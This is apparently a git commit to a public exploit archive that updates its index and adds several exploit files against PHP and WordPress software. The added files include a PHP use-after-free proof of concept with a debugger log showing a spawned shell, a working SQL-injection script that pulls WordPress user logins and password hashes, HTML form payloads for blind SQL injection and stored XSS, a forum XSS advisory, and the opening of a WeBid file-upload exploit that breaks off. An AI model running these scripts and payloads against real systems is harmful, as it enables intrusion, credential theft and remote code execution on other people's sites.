Update: 2015-02-25
21 new exploits
This commit is contained in:
parent
620cbde9f3
commit
d944419211
22 changed files with 1556 additions and 1 deletions
23
files.csv
23
files.csv
|
@ -22055,7 +22055,7 @@ id,file,description,date,author,platform,type,port
|
|||
24944,platforms/windows/remote/24944.py,"FreeFloat FTP 1.0 - DEP Bypass with ROP",2013-04-10,negux,windows,remote,0
|
||||
24945,platforms/hardware/remote/24945.rb,"Linksys WRT54GL apply.cgi Command Execution",2013-04-10,metasploit,hardware,remote,0
|
||||
24946,platforms/multiple/remote/24946.rb,"Adobe ColdFusion APSB13-03 - Remote Exploit",2013-04-10,metasploit,multiple,remote,0
|
||||
24947,platforms/linux/remote/24947.txt,"MongoDB 2.2.3 nativeHelper.apply - Remote Code Execution",2013-04-08,agixid,linux,remote,0
|
||||
24947,platforms/linux/remote/24947.txt,"MongoDB 2.2.3 - nativeHelper.apply Remote Code Execution",2013-04-08,agixid,linux,remote,0
|
||||
24950,platforms/windows/remote/24950.pl,"KNet Web Server 1.04b - Stack Corruption BoF",2013-04-12,Wireghoul,windows,remote,0
|
||||
24951,platforms/linux/dos/24951.pl,"ircd-hybrid 8.0.5 - Denial of Service",2013-04-12,kingcope,linux,dos,0
|
||||
24952,platforms/windows/dos/24952.py,"AT-TFTP Server 2.0 - Stack Based Buffer Overflow DoS",2013-04-12,xis_one,windows,dos,69
|
||||
|
@ -32499,6 +32499,8 @@ id,file,description,date,author,platform,type,port
|
|||
36057,platforms/cgi/webapps/36057.txt,"IBM Endpoint Manager - Stored XSS Vulnerability",2015-02-11,"RedTeam Pentesting",cgi,webapps,52311
|
||||
36058,platforms/php/webapps/36058.txt,"Wordpress Video Gallery 2.7.0 - SQL Injection Vulnerability",2015-02-12,"Claudio Viviani",php,webapps,0
|
||||
36059,platforms/php/webapps/36059.txt,"Exponent CMS 2.3.1 - Multiple XSS Vulnerabilities",2015-02-12,"Mayuresh Dani",php,webapps,80
|
||||
36061,platforms/php/webapps/36061.php,"WordPress Webdorado Spider Event Calendar 1.4.9 - SQL Injection",2015-02-13,"Mateusz Lach",php,webapps,0
|
||||
36062,platforms/windows/local/36062.txt,"Realtek 11n Wireless LAN utility - Privilege Escalation",2015-02-13,"Humberto Cabrera",windows,local,0
|
||||
36063,platforms/asp/webapps/36063.txt,"Code Widgets Online Job Application 'admin.asp' Multiple SQL Injection Vulnerabilities",2011-08-17,"L0rd CrusAd3r",asp,webapps,0
|
||||
36064,platforms/asp/webapps/36064.txt,"Code Widgets DataBound Index Style Menu 'category.asp' SQL Injection Vulnerability",2011-08-17,Inj3ct0r,asp,webapps,0
|
||||
36065,platforms/asp/webapps/36065.txt,"Code Widgets DataBound Collapsible Menu 'main.asp' SQL Injection Vulnerability",2011-08-17,Inj3ct0r,asp,webapps,0
|
||||
|
@ -32513,6 +32515,7 @@ id,file,description,date,author,platform,type,port
|
|||
36075,platforms/windows/remote/36075.py,"Freefloat FTP Server 'ALLO' Command Remote Buffer Overflow Vulnerability",2011-08-20,Black.Spook,windows,remote,0
|
||||
36076,platforms/php/webapps/36076.txt,"Concrete 5.4.1 1 'rcID' Parameter Cross Site Scripting Vulnerability",2011-08-22,"Aung Khant",php,webapps,0
|
||||
36077,platforms/php/webapps/36077.txt,"Open Classifieds 1.7.2 Multiple Cross Site Scripting Vulnerabilities",2011-08-23,"Yassin Aboukir",php,webapps,0
|
||||
36078,platforms/windows/remote/36078.py,"PCMan FTP Server 2.0.7 - Buffer Overflow - MKD Command",2015-02-14,R-73eN,windows,remote,0
|
||||
36079,platforms/php/webapps/36079.txt,"CommodityRentals Real Estate Script 'txtsearch' Parameter HTML Injection Vulnerability",2011-08-24,"Eyup CELIK",php,webapps,0
|
||||
36080,platforms/php/webapps/36080.txt,"Tourismscripts Hotel Portal 'hotel_city' Parameter HTML Injection Vulnerability",2011-08-24,"Eyup CELIK",php,webapps,0
|
||||
36081,platforms/php/webapps/36081.txt,"VicBlog 'tag' Parameter SQL Injection Vulnerability",2011-08-24,"Eyup CELIK",php,webapps,0
|
||||
|
@ -32520,6 +32523,8 @@ id,file,description,date,author,platform,type,port
|
|||
36083,platforms/php/webapps/36083.txt,"Simple Machines Forum 1.1.14/2.0 '[img]' BBCode Tag Cross Site Request Forgery Vulnerability",2011-08-25,"Christian Yerena",php,webapps,0
|
||||
36084,platforms/php/webapps/36084.html,"Mambo CMS 4.6.5 'index.php' Cross-Site Request Forgery Vulnerability",2011-08-26,Caddy-Dz,php,webapps,0
|
||||
36085,platforms/php/webapps/36085.txt,"phpWebSite <= 1.7.1 'mod.php' SQL Injection Vulnerability",2011-08-27,Ehsan_Hp200,php,webapps,0
|
||||
36086,platforms/php/webapps/36086.txt,"WonderPlugin Audio Player 2.0 - Blind SQL Injection and XSS",2015-02-16,"Kacper Szurek",php,webapps,0
|
||||
36087,platforms/php/webapps/36087.txt,"Fancybox for WordPress 3.0.2 - Stored XSS",2015-02-16,NULLpOint7r,php,webapps,0
|
||||
36089,platforms/php/webapps/36089.txt,"eTouch SamePage 4.4.0.0.239 - Multiple Vulnerabilities",2015-02-16,"Brandon Perry",php,webapps,80
|
||||
36090,platforms/php/webapps/36090.txt,"ClickCMS Denial of Service Vulnerability and CAPTCHA Bypass Vulnerability",2011-08-29,MustLive,php,webapps,0
|
||||
36091,platforms/php/webapps/36091.txt,"IBM Open Admin Tool 2.71 Multiple Cross Site Scripting Vulnerabilities",2011-08-30,"Sumit Kumar Soni",php,webapps,0
|
||||
|
@ -32578,3 +32583,19 @@ id,file,description,date,author,platform,type,port
|
|||
36149,platforms/php/webapps/36149.txt,"OneCMS 2.6.4 Multiple SQL Injection Vulnerabilities",2011-09-21,"kurdish hackers team",php,webapps,0
|
||||
36150,platforms/php/webapps/36150.txt,"Zyncro 3.0.1.20 Multiple HTML Injection Vulnerabilities",2011-09-22,"Ferran Pichel Llaquet",php,webapps,0
|
||||
36151,platforms/php/webapps/36151.txt,"Zyncro 3.0.1.20 Social Network Message Menu SQL Injection Vulnerability",2011-09-22,"Ferran Pichel Llaquet",php,webapps,0
|
||||
36152,platforms/windows/dos/36152.html,"Samsung iPOLiS 1.12.2 - iPOLiS XnsSdkDeviceIpInstaller ActiveX WriteConfigValue PoC",2015-02-22,"Praveen Darshanam",windows,dos,0
|
||||
36154,platforms/php/webapps/36154.txt,"Beehive Forum 1.4.4 - Stored XSS Vulnerability",2015-02-23,"Halil Dalabasmaz",php,webapps,0
|
||||
36155,platforms/php/webapps/36155.php,"WeBid 1.1.1 Unrestricted File Upload Exploit",2015-02-23,"CWH Underground",php,webapps,80
|
||||
36156,platforms/php/webapps/36156.txt,"Clipbucket 2.7 RC3 0.9 - Blind SQL Injection",2015-02-23,"CWH Underground",php,webapps,80
|
||||
36157,platforms/php/webapps/36157.rb,"Zabbix 2.0.5 - Cleartext ldap_bind_password Password Disclosure (MSF)",2015-02-23,"Pablo González",php,webapps,80
|
||||
36158,platforms/php/dos/36158.txt,"PHP DateTime Use After Free Vulnerability",2015-02-23,"Taoguang Chen",php,dos,0
|
||||
36159,platforms/php/webapps/36159.txt,"Zeuscart v.4 - Multiple Vulnerabilities",2015-02-23,"Steffen Rösemann",php,webapps,80
|
||||
36160,platforms/php/webapps/36160.txt,"phpBugTracker 1.6.0 - Multiple Vulnerabilities",2015-02-23,"Steffen Rösemann",php,webapps,80
|
||||
36161,platforms/php/webapps/36161.txt,"WordPress Easy Social Icons Plugin 1.2.2 - CSRF Vulnerability",2015-02-23,"Eric Flokstra",php,webapps,80
|
||||
36162,platforms/php/webapps/36162.txt,"TWiki <= 5.0.2 bin/view/Main/Jump newtopic Parameter XSS",2011-09-22,"Mesut Timur",php,webapps,0
|
||||
36163,platforms/php/webapps/36163.txt,"TWiki <= 5.0.2 SlideShowPlugin Slide Show Pages URI XSS",2011-09-22,"Mesut Timur",php,webapps,0
|
||||
36164,platforms/php/webapps/36164.txt,"AWStats 6.95/7.0 'awredir.pl' Multiple Cross-Site Scripting Vulnerabilities",2011-09-22,MustLive,php,webapps,0
|
||||
36165,platforms/php/webapps/36165.txt,"IceWarp Mail Server 10.3.2 server/webmail.php Soap Message Parsing Remote Arbitrary File Disclosure",2011-09-24,"David Kirkpatrick",php,webapps,0
|
||||
36166,platforms/php/webapps/36166.txt,"BuddyPress 1.2.10, WordPress 3.1.x, DEV Blogs Mu 1.2.6 Regular Subscriber HTML Injection Vulnerability",2011-09-26,knull,php,webapps,0
|
||||
36167,platforms/php/webapps/36167.txt,"AdaptCMS 2.0.1 Cross Site Scripting And Information Disclosure Vulnerabilities",2011-09-26,"Stefan Schurtz",php,webapps,0
|
||||
36168,platforms/php/webapps/36168.txt,"Serendipity Freetag-plugin <= 3.23 'serendipity[tagview]' Cross Site Scripting Vulnerability",2011-09-26,"Stefan Schurtz",php,webapps,0
|
||||
|
|
Can't render this file because it is too large.
|
137
platforms/php/dos/36158.txt
Executable file
137
platforms/php/dos/36158.txt
Executable file
|
@ -0,0 +1,137 @@
|
|||
Use After Free Vulnerability in unserialize() with DateTime* [CVE-2015-0273]
|
||||
|
||||
Taoguang Chen <[@chtg](http://github.com/chtg)> - Write Date:
|
||||
2015.1.29 - Release Date: 2015.2.20
|
||||
|
||||
A use-after-free vulnerability was discovered in unserialize() with DateTime/DateTimeZone/DateInterval/DatePeriod objects's __wakeup() magic method that can be abused for leaking arbitrary memory blocks or execute arbitrary code remotely.
|
||||
|
||||
Affected Versions
|
||||
------------
|
||||
Affected is PHP 5.6 < 5.6.6
|
||||
Affected is PHP 5.5 < 5.5.22
|
||||
Affected is PHP 5.4 < 5.4.38
|
||||
|
||||
Credits
|
||||
------------
|
||||
This vulnerability was disclosed by Taoguang Chen.
|
||||
|
||||
Description
|
||||
------------
|
||||
|
||||
static int php_date_initialize_from_hash(php_date_obj **dateobj,
|
||||
HashTable *myht)
|
||||
{
|
||||
zval *z_date;
|
||||
zval *z_timezone;
|
||||
zval *z_timezone_type;
|
||||
zval tmp_obj;
|
||||
timelib_tzinfo *tzi;
|
||||
php_timezone_obj *tzobj;
|
||||
|
||||
z_date = zend_hash_str_find(myht, "date", sizeof("data")-1);
|
||||
if (z_date) {
|
||||
convert_to_string(z_date);
|
||||
z_timezone_type = zend_hash_str_find(myht, "timezone_type",
|
||||
sizeof("timezone_type")-1);
|
||||
if (z_timezone_type) {
|
||||
convert_to_long(z_timezone_type);
|
||||
z_timezone = zend_hash_str_find(myht, "timezone", sizeof("timezone")-1);
|
||||
if (z_timezone) {
|
||||
convert_to_string(z_timezone);
|
||||
|
||||
...
|
||||
|
||||
static int php_date_timezone_initialize_from_hash(zval **return_value,
|
||||
php_timezone_obj **tzobj, HashTable *myht TSRMLS_DC)
|
||||
{
|
||||
zval **z_timezone = NULL;
|
||||
zval **z_timezone_type = NULL;
|
||||
|
||||
if (zend_hash_find(myht, "timezone_type", 14, (void**)
|
||||
&z_timezone_type) == SUCCESS) {
|
||||
if (zend_hash_find(myht, "timezone", 9, (void**) &z_timezone) == SUCCESS) {
|
||||
convert_to_long(*z_timezone_type);
|
||||
if (SUCCESS == timezone_initialize(*tzobj, Z_STRVAL_PP(z_timezone)
|
||||
TSRMLS_CC)) {
|
||||
return SUCCESS;
|
||||
}
|
||||
}
|
||||
}
|
||||
return FAILURE;
|
||||
}
|
||||
|
||||
The convert_to_long() leads to the ZVAL and all its children is freed
|
||||
from memory. However the unserialize() code will still allow to use R:
|
||||
or r: to set references to that already freed memory. There is a use
|
||||
after free vulnerability, and allows to execute arbitrary code.
|
||||
|
||||
Proof of Concept Exploit
|
||||
------------
|
||||
The PoC works on standard MacOSX 10.10.2 installation of PHP 5.5.14.
|
||||
|
||||
<?php
|
||||
|
||||
$f = $argv[1];
|
||||
$c = $argv[2];
|
||||
|
||||
$fakezval1 = ptr2str(0x100b83008);
|
||||
$fakezval1 .= ptr2str(0x8);
|
||||
$fakezval1 .= "\x00\x00\x00\x00";
|
||||
$fakezval1 .= "\x06";
|
||||
$fakezval1 .= "\x00";
|
||||
$fakezval1 .= "\x00\x00";
|
||||
|
||||
$data1 = 'a:3:{i:0;O:12:"DateTimeZone":2:{s:13:"timezone_type";a:1:{i:0;i:1;}s:8:"timezone";s:3:"UTC";}i:1;s:'.strlen($fakezval1).':"'.$fakezval1.'";i:2;a:1:{i:0;R:4;}}';
|
||||
|
||||
$x = unserialize($data1);
|
||||
$y = $x[2];
|
||||
|
||||
// zend_eval_string()'s address
|
||||
$y[0][0] = "\x6d";
|
||||
$y[0][1] = "\x1e";
|
||||
$y[0][2] = "\x35";
|
||||
$y[0][3] = "\x00";
|
||||
$y[0][4] = "\x01";
|
||||
$y[0][5] = "\x00";
|
||||
$y[0][6] = "\x00";
|
||||
$y[0][7] = "\x00";
|
||||
|
||||
$fakezval2 = ptr2str(0x3b296324286624); // $f($c);
|
||||
$fakezval2 .= ptr2str(0x100b83000);
|
||||
$fakezval2 .= "\x00\x00\x00\x00";
|
||||
$fakezval2 .= "\x05";
|
||||
$fakezval2 .= "\x00";
|
||||
$fakezval2 .= "\x00\x00";
|
||||
|
||||
$data2 = 'a:3:{i:0;O:12:"DateTimeZone":2:{s:13:"timezone_type";a:1:{i:0;i:1;}s:8:"timezone";s:3:"UTC";}i:1;s:'.strlen($fakezval2).':"'.$fakezval2.'";i:2;O:12:"DateTimeZone":2:{s:13:"timezone_type";a:1:{i:0;R:4;}s:8:"timezone";s:3:"UTC";}}';
|
||||
|
||||
$z = unserialize($data2);
|
||||
|
||||
function ptr2str($ptr)
|
||||
{
|
||||
$out = "";
|
||||
for ($i=0; $i<8; $i++) {
|
||||
$out .= chr($ptr & 0xff);
|
||||
$ptr >>= 8;
|
||||
}
|
||||
return $out;
|
||||
}
|
||||
|
||||
?>
|
||||
|
||||
Test the PoC on the command line, then any PHP code can be executed:
|
||||
|
||||
$ lldb php
|
||||
(lldb) target create "php"
|
||||
Current executable set to 'php' (x86_64).
|
||||
(lldb) run uafpoc.php assert "system\('sh'\)==exit\(\)"
|
||||
Process 13472 launched: '/usr/bin/php' (x86_64)
|
||||
sh: no job control in this shell
|
||||
sh-3.2$ php -v
|
||||
PHP 5.5.14 (cli) (built: Sep 9 2014 19:09:25)
|
||||
Copyright (c) 1997-2014 The PHP Group
|
||||
Zend Engine v2.5.0, Copyright (c) 1998-2014 Zend Technologies
|
||||
sh-3.2$ exit
|
||||
exit
|
||||
Process 13472 exited with status = 0 (0x00000000)
|
||||
(lldb)
|
85
platforms/php/webapps/36061.php
Executable file
85
platforms/php/webapps/36061.php
Executable file
|
@ -0,0 +1,85 @@
|
|||
<?php
|
||||
|
||||
/*
|
||||
|
||||
# Exploit Title: WordPress: Webdorado Spider Event Calendar <= 1.4.9 [SQL Injection]
|
||||
# Date: 2015-02-12
|
||||
# Exploit Author: Mateusz Lach
|
||||
# Vendor Homepage: https://www.facebook.com/WebDorado or http://www.webdorado.com
|
||||
# Software Link: https://downloads.wordpress.org/plugin/spider-event-calendar.1.4.9.zip
|
||||
# Version: 1.4.9
|
||||
# Tested on: OpenSUSE Linux + Chrome and Firefox, it's PHP application.
|
||||
# CVE : CWE-89
|
||||
# OWASP Top10: A1-Injection
|
||||
|
||||
|
||||
This program is free software: you can redistribute it and/or modify
|
||||
it under the terms of the GNU General Public License as published by
|
||||
the Free Software Foundation, either version 3 of the License, or
|
||||
(at your option) any later version.
|
||||
|
||||
This program is distributed in the hope that it will be useful,
|
||||
but WITHOUT ANY WARRANTY; without even the implied warranty of
|
||||
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
|
||||
GNU General Public License for more details.
|
||||
|
||||
You should have received a copy of the GNU General Public License
|
||||
along with this program. If not, see <http://www.gnu.org/licenses/>.
|
||||
|
||||
# Exploit Title: WordPress: Webdorado Spider Event Calendar <= 1.4.9 [SQL Injection]
|
||||
# Date: 2015-02-12
|
||||
# Exploit Author: Mateusz Lach
|
||||
# Vendor Homepage: https://www.facebook.com/WebDorado or http://www.webdorado.com
|
||||
# Software Link: https://downloads.wordpress.org/plugin/spider-event-calendar.1.4.9.zip
|
||||
# Version: 1.4.9
|
||||
# Tested on: OpenSUSE Linux + Chrome and Firefox, it's PHP application.
|
||||
# CVE : CWE-89
|
||||
# OWASP Top10: A1-Injection
|
||||
*/
|
||||
|
||||
define('FETCH_PREFIX_URL', 'http://%s/wp-admin/admin-ajax.php?action=spiderbigcalendar_month&theme_id=13&calendar=1&select=month,list,week,day,&date=2015-02&many_sp_calendar=1&cur_page_url=%s&cat_id=1)%%20UNION%%20SELECT%%20%s,1,%%20FROM_UNIXTIME(1423004400),1,(SELECT%%20CONCAT(CHAR(35,35,35,35),table_name,CHAR(35,35,35,35))%%20FROM%%20information_schema.tables%%20WHERE%%20table_name%%20LIKE%%20(%%20SELECT%%20CHAR(37,%%20117,%%20115,%%20101,%%20114,%%20115)%%20)%%20LIMIT%%201),1,1,1,1,%%20CHAR(110,%%20111,%%2095,%%20114,%%20101,%%20112,%%20101,%%2097,%%20116),1,1,1,1,1,1,1,1,1%%20FROM%%20DUAL;--%%20--%%20&widget=0');
|
||||
|
||||
define('FETCH_USERS_URL', 'http://%s/wp-admin/admin-ajax.php?action=spiderbigcalendar_month&theme_id=13&calendar=1&select=month,list,week,day,&date=2015-02&many_sp_calendar=1&cur_page_url=%s&cat_id=1)%%20UNION%%20SELECT%%20%s,1,%%20FROM_UNIXTIME(1423004400),1,%%20CONCAT(CHAR(35,33,35,33,35,33,35),GROUP_CONCAT(%%20CONCAT(%%20CONCAT(user_login,CHAR(35,%%2035),user_pass))),CHAR(35,33,35,33,35,33,35)),%%201,1,1,1,%%20CHAR(110,%%20111,%%2095,%%20114,%%20101,%%20112,%%20101,%%2097,%%20116),1,1,1,1,1,1,1,1,1%%20as%%20fakeGroup%%20FROM%%20%s%%20GROUP%%20BY%%20fakeGroup;--%%20&widget=0');
|
||||
|
||||
define('FAKE_ID_TO_SEARCH', 12345677654321);
|
||||
define('PATTERN_TO_SEARCH', 'ev_ids='.FAKE_ID_TO_SEARCH);
|
||||
define('PATTERN_TO_SEARCH_USERS', '#!#!#!#');
|
||||
define('ROW_SEPARATOR', ',');
|
||||
define('FIELD_SEPARATOR', '##');
|
||||
$server = $_GET['SRV'];
|
||||
if (empty($server))
|
||||
{
|
||||
echo 'Please put server (without protocol) name in SRV GET variable!';
|
||||
}
|
||||
else
|
||||
{
|
||||
$fullURL = sprintf(FETCH_PREFIX_URL, $server, $server, FAKE_ID_TO_SEARCH);
|
||||
$prefixCurl = curl_init($fullURL);
|
||||
curl_setopt($prefixCurl, CURLOPT_RETURNTRANSFER, true);
|
||||
$result = curl_exec($prefixCurl);
|
||||
if (stripos($result, PATTERN_TO_SEARCH) !== false)
|
||||
{
|
||||
preg_match('/####[a-zA-Z\_0-9]*####/', $result, $tableNames);
|
||||
$tableName = str_replace('####', '', $tableNames[0]);
|
||||
echo 'tableName: '.$tableName.'<BR/>';
|
||||
$fullURL = sprintf(FETCH_USERS_URL, $server, $server, FAKE_ID_TO_SEARCH, $tableName);
|
||||
$usersCurl = curl_init($fullURL);
|
||||
curl_setopt($usersCurl, CURLOPT_RETURNTRANSFER, true);
|
||||
$result = curl_exec($usersCurl);
|
||||
if (stripos($result, PATTERN_TO_SEARCH) !== false)
|
||||
{
|
||||
$from = stripos($result, PATTERN_TO_SEARCH_USERS);
|
||||
$to = stripos($result, PATTERN_TO_SEARCH_USERS, $from + strlen(PATTERN_TO_SEARCH_USERS));
|
||||
$result = substr($result, $from, $to-$from);
|
||||
echo '<table><tr><td>'.str_replace(FIELD_SEPARATOR, '</td><td>', str_replace(ROW_SEPARATOR, '</td></tr><tr><td>', str_replace(PATTERN_TO_SEARCH_USERS, '', $result))).'</td></tr></table>';
|
||||
}
|
||||
else
|
||||
{
|
||||
echo 'Table name fetched, but not users - try to rewrite exploit :-(';
|
||||
}
|
||||
}
|
||||
else
|
||||
{
|
||||
echo 'NOT vulnerable :-(';
|
||||
}
|
||||
}
|
45
platforms/php/webapps/36086.txt
Executable file
45
platforms/php/webapps/36086.txt
Executable file
|
@ -0,0 +1,45 @@
|
|||
# Exploit Title: WonderPlugin Audio Player 2.0 Blind SQL Injection and XSS
|
||||
# Date: 20-01-2015
|
||||
# Software Link: http://www.wonderplugin.com/wordpress-audio-player/
|
||||
# Exploit Author: Kacper Szurek
|
||||
# Contact: http://twitter.com/KacperSzurek
|
||||
# Website: http://security.szurek.pl/
|
||||
# Category: webapps
|
||||
|
||||
1. Description
|
||||
|
||||
wp_ajax_save_item() is accessible for every registered user (admin privileges are not checked).
|
||||
|
||||
save_item() uses is_id_exist() in which $id is not escaped properly.
|
||||
|
||||
2. Proof of Concept
|
||||
|
||||
Login as standard user (created using wp-login.php?action=register) then:
|
||||
|
||||
<form method="post" action="http://wordpress-url/wp-admin/admin-ajax.php?action=wonderplugin_audio_save_item">
|
||||
<input type="text" name="item[id]" value="1 UNION (SELECT 1, 2, 3, 4, IF(substr(user_pass,1,1) = CHAR(36), SLEEP(5), 0) FROM `wp_users` WHERE ID = 1)">
|
||||
<input type="submit" value="Hack!">
|
||||
</form>
|
||||
|
||||
This SQL will check if first password character user ID=1 is "$".
|
||||
|
||||
If yes it will sleep 5 seconds.
|
||||
|
||||
For XSS use:
|
||||
|
||||
<form method="post" action="http://wordpress-url/wp-admin/admin-ajax.php?action=wonderplugin_audio_save_item">
|
||||
<input type="hidden" name="item[id]" value="1">
|
||||
<input type="text" name="item[name]" value='<script>alert(String.fromCharCode(88,83,83));</script>'>
|
||||
<input type="text" name="item[customcss]" value='</style><script>alert(String.fromCharCode(88,83,83));</script>'>
|
||||
<input type="submit" value="Hack!">
|
||||
</form>
|
||||
|
||||
It will be visible on every page where shortcode wonderplugin_audio is used and also in admin panel:
|
||||
|
||||
http://wordpress-url/wp-admin/admin.php?page=wonderplugin_audio_show_items
|
||||
|
||||
http://security.szurek.pl/wonderplugin-audio-player-20-blind-sql-injection-and-xss.html
|
||||
|
||||
3. Solution:
|
||||
|
||||
Update to version 2.1
|
28
platforms/php/webapps/36087.txt
Executable file
28
platforms/php/webapps/36087.txt
Executable file
|
@ -0,0 +1,28 @@
|
|||
# Exploit Title: Wordpress plugin Fancybox-for-WordPress Stored XSS
|
||||
# Exploit Author: NULLpOint7r
|
||||
# Date: 2015-02-11
|
||||
# Contact me: seidbenseidok@gmail.com
|
||||
# Version: 3.0.2
|
||||
# Download link: https://downloads.wordpress.org/plugin/fancybox-for-wordpress.3.0.2.zip
|
||||
# Home: http://www.sec4ever.com/home/
|
||||
|
||||
vulnerable code [fancybox.php]:
|
||||
342. if ( isset($_GET['page']) && $_GET['page'] == 'fancybox-for-wordpress' ) {
|
||||
343.
|
||||
344. if ( isset($_REQUEST['action']) && 'update' == $_REQUEST['action'] ) {
|
||||
345.
|
||||
346. $settings = stripslashes_deep( $_POST['mfbfw'] );
|
||||
347. $settings = array_map( 'convert_chars', $settings );
|
||||
348.
|
||||
349. update_option( 'mfbfw', $settings );
|
||||
350. wp_safe_redirect( add_query_arg('updated', 'true') );
|
||||
|
||||
exploit:
|
||||
|
||||
<form method="POST" action="http://127.0.0.1/wp-admin/admin-post.php?page=fancybox-for-wordpress">
|
||||
<input type="text" name="action" value="update">
|
||||
<input type="text" name="mfbfw[padding]" value="</script><script>alert(/Owned by someone/)</script>">
|
||||
<input type="submit" value="Send">
|
||||
</form>
|
||||
|
||||
|
142
platforms/php/webapps/36154.txt
Executable file
142
platforms/php/webapps/36154.txt
Executable file
|
@ -0,0 +1,142 @@
|
|||
Document Title:
|
||||
============
|
||||
Beehive Forum v1.4.4 Stored XSS Vulnerability
|
||||
|
||||
Author:
|
||||
==============
|
||||
Halil Dalabasmaz
|
||||
|
||||
Release Date:
|
||||
===========
|
||||
23 Feb 2015
|
||||
|
||||
Product & Service Introduction:
|
||||
========================
|
||||
Beehive is an open-source project for creating a high-configurable
|
||||
frame-based discussion forum.
|
||||
|
||||
Vendor Homepage:
|
||||
=================
|
||||
http://www.beehiveforum.co.uk
|
||||
|
||||
Abstract Advisory Information:
|
||||
=======================
|
||||
BGA Security Team discovered an Stored XSS vulnerability in
|
||||
Beehive Forum v1.4.4
|
||||
|
||||
Vulnerability Disclosure Timeline:
|
||||
=========================
|
||||
20 Feb 2015 - Contact with Vendor
|
||||
21 Feb 2015 - Vendor Response
|
||||
22 Feb 2015 - Vendor Fix
|
||||
23 Feb 2015 - Confirm Fix
|
||||
23 Feb 2015 - Public Disclosure
|
||||
|
||||
Discovery Status:
|
||||
=============
|
||||
Published
|
||||
|
||||
Affected Product(s):
|
||||
===============
|
||||
Beehive Forum v1.4.4
|
||||
|
||||
Exploitation Technique:
|
||||
==================
|
||||
Remote, Unauthenticated
|
||||
|
||||
Severity Level:
|
||||
===========
|
||||
High
|
||||
|
||||
Technical Details & Description:
|
||||
========================
|
||||
Stored XSS
|
||||
|
||||
Tested On:
|
||||
============
|
||||
Iceweasel & Chromium
|
||||
|
||||
Sample Payload:
|
||||
=================
|
||||
http://"><script>alert('XSS');</script>
|
||||
|
||||
Proof of Concept (PoC):
|
||||
=======================
|
||||
Proof of Concept
|
||||
|
||||
The vulnerable inputs are "Homepage URL", "Picture URL" and "Avatar URL" on Profile Section.
|
||||
Following line contain the vulnerability in edit_prefs.php;
|
||||
|
||||
if (isset($_POST['homepage_url'])) {
|
||||
|
||||
$user_prefs['HOMEPAGE_URL'] = trim($_POST['homepage_url']);
|
||||
$user_prefs_global['HOMEPAGE_URL'] = (isset($_POST['homepage_url_global'])) ? $_POST['homepage_url_global'] == "Y" : true;
|
||||
|
||||
if (strlen(trim($user_prefs['HOMEPAGE_URL'])) > 0) {
|
||||
|
||||
if (preg_match('/^http:\/\//u', $user_prefs['HOMEPAGE_URL']) < 1) {
|
||||
$error_msg_array[] = gettext("Homepage URL must include http:// schema.");
|
||||
$valid = false;
|
||||
|
||||
} else if (!user_check_pref('HOMEPAGE_URL', $user_prefs['HOMEPAGE_URL'])) {
|
||||
|
||||
$error_msg_array[] = sprintf(gettext("%s contains invalid characters!"), gettext("Homepage URL"));
|
||||
$valid = false;
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
if (isset($_POST['pic_url'])) {
|
||||
|
||||
$user_prefs['PIC_URL'] = trim($_POST['pic_url']);
|
||||
$user_prefs_global['PIC_URL'] = (isset($_POST['pic_url_global'])) ? $_POST['pic_url_global'] == "Y" : true;
|
||||
|
||||
if (strlen(trim($user_prefs['PIC_URL'])) > 0) {
|
||||
|
||||
if (preg_match('/^http:\/\//u', $user_prefs['PIC_URL']) < 1) {
|
||||
$error_msg_array[] = gettext("Picture URL must include http:// schema.");
|
||||
$valid = false;
|
||||
|
||||
} else if (!user_check_pref('PIC_URL', $user_prefs['PIC_URL'])) {
|
||||
|
||||
$error_msg_array[] = sprintf(gettext("%s contains invalid characters!"), gettext("Picture URL"));
|
||||
$valid = false;
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
if (strlen(trim($user_prefs['AVATAR_URL'])) > 0) {
|
||||
|
||||
if (preg_match('/^http:\/\//u', $user_prefs['AVATAR_URL']) < 1) {
|
||||
$error_msg_array[] = gettext("Avatar URL must include http:// schema.");
|
||||
$valid = false;
|
||||
|
||||
} else if (!user_check_pref('AVATAR_URL', $user_prefs['AVATAR_URL'])) {
|
||||
|
||||
$error_msg_array[] = sprintf(gettext("%s contains invalid characters!"), gettext("Avatar URL"));
|
||||
$valid = false;
|
||||
}
|
||||
}
|
||||
|
||||
Solution Fix & Patch:
|
||||
================
|
||||
Upgrade the the script.
|
||||
|
||||
Security Risk:
|
||||
==========
|
||||
The risk of the vulnerabilities above estimated as high.
|
||||
|
||||
Disclaimer & Information:
|
||||
===================
|
||||
The information provided in this advisory is provided as it is without
|
||||
any warranty. BGA disclaims all warranties, either expressed or
|
||||
implied, including the warranties of merchantability and capability for
|
||||
a particular purpose. BGA or its suppliers are not liable in any case of
|
||||
damage, including direct, indirect, incidental, consequential loss of
|
||||
business profits or special damages.
|
||||
|
||||
Domain: www.bga.com.tr
|
||||
Social: twitter.com/bgasecurity
|
||||
Contact: advisory@bga.com.tr
|
||||
|
||||
Copyright © 2015 | BGA - Bilgi Güvenli?i Akademisi
|
126
platforms/php/webapps/36155.php
Executable file
126
platforms/php/webapps/36155.php
Executable file
|
@ -0,0 +1,126 @@
|
|||
<?php
|
||||
|
||||
/*
|
||||
|
||||
,--^----------,--------,-----,-------^--,
|
||||
| ||||||||| `--------' | O .. CWH Underground Hacking Team ..
|
||||
`+---------------------------^----------|
|
||||
`\_,-------, _________________________|
|
||||
/ XXXXXX /`| /
|
||||
/ XXXXXX / `\ /
|
||||
/ XXXXXX /\______(
|
||||
/ XXXXXX /
|
||||
/ XXXXXX /
|
||||
(________(
|
||||
`------'
|
||||
|
||||
Exploit Title : WeBid 1.1.1 Unrestricted File Upload Exploit
|
||||
Date : 20 February 2015
|
||||
Exploit Author : CWH Underground
|
||||
Site : www.2600.in.th
|
||||
Vendor Homepage : http://www.webidsupport.com/
|
||||
Software Link : http://sourceforge.net/projects/simpleauction/files/simpleauction/WeBid%20v1.1.1/WeBid-1.1.1.zip/download
|
||||
Version : 1.1.1
|
||||
Tested on : Window and Linux
|
||||
|
||||
|
||||
#####################################################
|
||||
VULNERABILITY: Arbitrary File Upload Vulnerability
|
||||
#####################################################
|
||||
|
||||
/ajax.php
|
||||
/inc/plupload/examples/upload.php
|
||||
|
||||
#####################################################
|
||||
DESCRIPTION
|
||||
#####################################################
|
||||
|
||||
This exploit a file upload vulnerability found in WeBid 1.1.1, and possibly prior. Attackers can abuse the
|
||||
upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.
|
||||
|
||||
#####################################################
|
||||
